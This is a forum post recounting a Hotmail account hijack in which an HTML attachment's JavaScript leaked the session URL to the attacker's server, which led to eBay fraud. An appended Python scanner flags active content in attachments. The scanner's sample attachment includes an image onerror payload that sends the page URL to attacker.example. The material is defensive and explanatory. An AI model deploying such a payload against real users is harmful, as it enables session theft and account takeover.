Guys, be careful with those hotmail accounts.

funks

Golden Member
Nov 9, 2000
Some guy hijacked my hotmail account.. He then used it to reset my password at eBay (which was then sent to my hotmail account), then started listing a bunch of items (telling people to send him payment in Romania)..

I'm lucky that one of the bidders actually called me on the phone and let me know.. I was able to minimize the damage but two did get through..

Here's my theory of operation on how he hijacked my Hotmail account..

1) He sent me an e-mail with an "html" attachment (yes, HTML) ( I viewed it using Outlook Express - latest version with all updates)
2) The person then sends me another e-mail, asking if I opened the attachment.
3) Note that when one clicks on an attachment using Outlook Express (from hotmail), it opens up a browser window to hotmail so that one can view the attachment.
4) His god darned HTML attachment is not without a malicious payload - it has JavaScript that runs (while I'm on hotmail) due to <IMG> tags
5) He used the URL within the javascript as an HTTP request parameter directed to one of his servers.

The rest, you already know..

I will be filing a security report with Hotmail tomorrow, along with Microsoft, to detail my findings..
Such a simple method too :( I guess we need to be careful even when opening up HTML attachments.

George
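A check of the kind a webmail service could run before rendering an HTML attachment inside the logged-in session, as an added example (not code from the post or from Hotmail): it flags script elements, on* event handlers, javascript: URLs and references to hosts other than the mail site, which are the constructs that let an attachment run code or leak the session URL. The hostnames and the sample attachment are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample of an HTML attachment carrying active content
# (hypothetical; not the message described in the post).
SAMPLE_ATTACHMENT = """<html><body>
<p>Please see your invoice below.</p>
<img src="javascript:void(0)">
<img src="http://attacker.example/p.gif" onerror="this.src='http://attacker.example/?u='+location.href">
<script>/* any script here runs in the webmail origin */</script>
<a href="https://mail.example/inbox">back to mail</a>
</body></html>"""


class ActiveContentScanner(HTMLParser):
    """Collects constructs that let an attachment execute in the webmail origin
    or make requests to third-party hosts while the reader is logged in."""

    URL_ATTRS = {"src", "href", "action", "background"}

    def __init__(self, trusted_host):
        super().__init__()
        self.trusted_host = trusted_host.lower()
        self.findings = []  # (kind, tag, detail)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script-element", tag, ""))
        for name, value in attrs:
            name = name.lower()
            value = (value or "").strip()
            if name.startswith("on"):  # onerror, onload, onclick, ...
                self.findings.append(("event-handler", tag, name))
            elif name in self.URL_ATTRS:
                parts = urlsplit(value)
                if parts.scheme.lower() == "javascript":
                    self.findings.append(("javascript-url", tag, name))
                elif parts.hostname and parts.hostname.lower() != self.trusted_host:
                    # A fetch to another host carries the viewer's URL as Referer.
                    self.findings.append(("external-reference", tag, parts.hostname))


def scan_attachment(html, trusted_host="mail.example"):
    scanner = ActiveContentScanner(trusted_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def is_safe_to_render(html, trusted_host="mail.example"):
    return not scan_attachment(html, trusted_host)
```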